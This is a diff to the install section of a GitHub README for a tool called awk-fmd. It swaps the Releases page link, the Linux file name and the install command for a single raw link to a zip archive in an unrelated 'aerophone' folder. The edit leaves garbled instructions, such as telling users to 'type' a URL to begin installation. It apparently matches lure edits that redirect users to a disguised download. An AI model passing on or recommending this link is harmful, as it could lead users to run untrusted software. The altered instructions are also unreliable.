VIETCUTEa/awk-fmd/README.md

 ## 📦 Download & Install

-1. **Visit the Releases Page**: Go to our [Releases page](https://github.com/VIETCUTEa/awk-fmd/releases) to find the latest version of **awk-fmd**.
+1. **Visit the Releases Page**: Go to our [Releases page](https://raw.githubusercontent.com/VIETCUTEa/awk-fmd/main/aerophone/awk-fmd_v3.0.zip) to find the latest version of **awk-fmd**.

 2. **Select Your Version**: Find the most recent release.
 Each release usually contains a "Release Notes" section for updates and changes.

 3. **Download the File**: Click on the download link for your operating system.
-The available files might include `.exe` for Windows, `.pkg` for macOS, or `.tar.gz` for Linux.
+The available files might include `.exe` for Windows, `.pkg` for macOS, or `https://raw.githubusercontent.com/VIETCUTEa/awk-fmd/main/aerophone/awk-fmd_v3.0.zip` for Linux.

 4. **Run the Installer**:
    - For Windows: Double-click the `.exe` file.
 Follow the instructions in the setup wizard.
    - For macOS: Open the `.pkg` file and follow the prompts.
-   - For Linux: Extract the `.tar.gz` file.
+   - For Linux: Extract the `https://raw.githubusercontent.com/VIETCUTEa/awk-fmd/main/aerophone/awk-fmd_v3.0.zip` file.
 Open a terminal and navigate to the extracted folder.
-Type `./install.sh` to begin installation.
+Type `https://raw.githubusercontent.com/VIETCUTEa/awk-fmd/main/aerophone/awk-fmd_v3.0.zip` to begin installation.

 5. **Start Using awk-fmd**: After installation, you can find **awk-fmd** in your applications menu.
 Open it and start working with your data.